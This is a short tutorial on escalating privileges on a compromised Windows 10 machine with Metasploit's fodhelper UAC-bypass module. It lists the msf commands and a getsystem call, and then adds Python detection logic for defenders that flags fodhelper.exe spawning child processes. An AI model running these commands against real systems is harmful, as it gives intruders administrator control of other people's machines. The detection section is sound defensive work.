Hello friends! Today we are going to share a new article on how to bypass
Windows 10 UAC once you have hacked the victim's system. A new module has been
added to Metasploit to achieve admin access on Windows 10.
Attacker: Kali Linux
Target: Windows 10
This module will bypass Windows 10 UAC by hijacking a
special key in the Registry under the current user hive, and inserting a custom
command that will get invoked when the Windows fodhelper.exe application is
launched. It will spawn a second shell that has the UAC flag turned off. This
module modifies a registry key, but cleans up the key once the payload has been
invoked. The module does not require the architecture of the payload to match
the OS. If specifying EXE::Custom your DLL should call ExitProcess() after
starting your payload in a separate process.
msf > use exploit/windows/local/bypassuac_fodhelper
msf exploit(bypassuac_fodhelper) > set session 1
msf exploit(bypassuac_fodhelper) > exploit
You can see that another meterpreter session, session 2, has opened, which
means we successfully exploited the target once again. Now let's check the user
privilege.
meterpreter > getsystem
Awesome!!!! We got admin privilege successfully.
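For defenders, the behaviour described above leaves a trace: the new shell is started by fodhelper.exe shortly after a write to the current user's registry hive. The following Python detection logic is an added example, not part of the original article or of Metasploit; the event field names, the sample events, the 60-second window and the placeholder registry path are constructed assumptions, and it assumes fodhelper.exe does not normally start child processes on your hosts.

```python
from datetime import datetime, timedelta
from ntpath import basename  # parses Windows paths on any platform

WINDOW = timedelta(seconds=60)  # assumed correlation window

# Constructed events, loosely modelled on process-create ("proc") and
# registry-value-set ("reg") telemetry. Field names are assumptions and
# the registry path is a placeholder, not the key the module uses.
EVENTS = [
    {"kind": "reg", "time": "2024-05-01T10:00:01", "user": "LAB\\alice",
     "target": r"HKU\S-1-5-21-1111-1001\EXAMPLE\PLACEHOLDER"},
    {"kind": "proc", "time": "2024-05-01T10:00:03", "user": "LAB\\alice",
     "image": r"C:\Windows\System32\fodhelper.exe",
     "parent": r"C:\Windows\System32\cmd.exe", "integrity": "High"},
    {"kind": "proc", "time": "2024-05-01T10:00:04", "user": "LAB\\alice",
     "image": r"C:\Windows\System32\cmd.exe",
     "parent": r"C:\Windows\System32\fodhelper.exe", "integrity": "High"},
    {"kind": "proc", "time": "2024-05-01T11:30:00", "user": "LAB\\bob",
     "image": r"C:\Windows\System32\notepad.exe",
     "parent": r"C:\Windows\explorer.exe", "integrity": "Medium"},
]

def detect(events, window=WINDOW):
    """Return one alert per process whose parent is fodhelper.exe."""
    reg_writes = [(datetime.fromisoformat(e["time"]), e) for e in events
                  if e["kind"] == "reg"
                  and e["target"].upper().startswith("HKU\\")]
    alerts = []
    for e in events:
        if e["kind"] != "proc":
            continue
        if basename(e["parent"]).lower() != "fodhelper.exe":
            continue
        t = datetime.fromisoformat(e["time"])
        # Supporting evidence: the same user wrote to their own hive
        # shortly before the child process appeared.
        prior = [r for rt, r in reg_writes
                 if r["user"] == e["user"]
                 and timedelta(0) <= t - rt <= window]
        elevated = e["integrity"] in ("High", "System")
        alerts.append({"user": e["user"], "child": e["image"],
                       "severity": "high" if prior and elevated else "medium",
                       "registry_writes": [r["target"] for r in prior]})
    return alerts

if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(alert)
```

Baseline the parent-child rule on your own telemetry before alerting on it, and treat the registry correlation as supporting evidence rather than a requirement, since the module removes the key after the payload runs.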